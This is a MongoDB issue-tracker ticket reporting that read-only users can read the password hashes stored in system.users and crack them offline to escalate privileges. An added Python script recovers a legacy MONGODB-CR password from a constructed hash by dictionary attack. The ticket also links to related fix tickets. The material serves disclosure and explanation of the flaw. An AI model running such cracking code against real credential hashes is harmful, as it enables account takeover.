Original Title: system.users collection placement allows offline dictionary attack for read-only users
When using authentication with MongoDB, users with read-write permissions have their password hashes stored in system.users. Read-only users can read these hashes. This permits read-only users to read the password hashes of read-write users and perform an offline dictionary attack in order to escalate their privileges.
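The attack the ticket describes, as an added example that is not part of the original report: a read-only user who can run db.system.users.find() copies the "pwd" field of a read-write user and tests candidate passwords offline. The example assumes the legacy MONGODB-CR scheme used by MongoDB before 2.6, where the stored digest is hex(md5(username + ":mongo:" + password)); the system.users document, the usernames and the wordlist are constructed for the demo.

```python
"""Offline dictionary attack against a MONGODB-CR hash read from system.users.

Added example, not code from the original ticket or from MongoDB. Assumes the
legacy MONGODB-CR scheme: stored pwd == hex(md5(user + ":mongo:" + password)).
"""
import hashlib
from typing import Iterable, Optional


def mongodb_cr_hash(user: str, password: str) -> str:
    """Legacy MONGODB-CR digest (assumption: md5 over 'user:mongo:password')."""
    return hashlib.md5(f"{user}:mongo:{password}".encode("utf-8")).hexdigest()


# Constructed system.users document, shaped like what a read-only user could
# fetch with db.system.users.find() on an affected server. The password is
# chosen here only so the demo has a hash to crack.
READWRITE_USER_DOC = {
    "user": "appadmin",
    "readOnly": False,
    "pwd": mongodb_cr_hash("appadmin", "Summer2013"),
}

# Constructed wordlist; a real attacker would use a large leaked-password list.
WORDLIST = ["password", "123456", "admin", "Summer2013", "letmein"]


def dictionary_attack(doc: dict, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose digest matches doc['pwd'], else None.

    Everything after reading the document runs offline: the only per-user
    input to the digest is the username, which is also visible in the
    document, so no further server interaction (and no rate limit) applies.
    """
    user = doc["user"]
    target = doc["pwd"].lower()
    for candidate in wordlist:
        if mongodb_cr_hash(user, candidate) == target:
            return candidate
    return None


if __name__ == "__main__":
    hit = dictionary_attack(READWRITE_USER_DOC, WORDLIST)
    if hit is None:
        print(f"no match for {READWRITE_USER_DOC['user']} in {len(WORDLIST)} candidates")
    else:
        print(f"{READWRITE_USER_DOC['user']}: password recovered -> {hit!r}")
```

Because the username is the only salt-like input, the digest defeats a single precomputed table shared across users but does nothing against a per-user dictionary run like the one above; the practical fix tracked in the related tickets is to stop read-only users from reading system.users at all, rather than to rely on the hash format.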
Issue links

is related to
- SERVER-7604 On MongoS read-only users should be denied access to system.users collection (Closed)
- SERVER-9009 mongodump fails when run by a read-only user (Closed)
- TOOLS-134 Mongodump and mongoexport should skip collections they don't have read access to (Closed)

related to
- SERVER-6031 read only user can get write priority (Closed)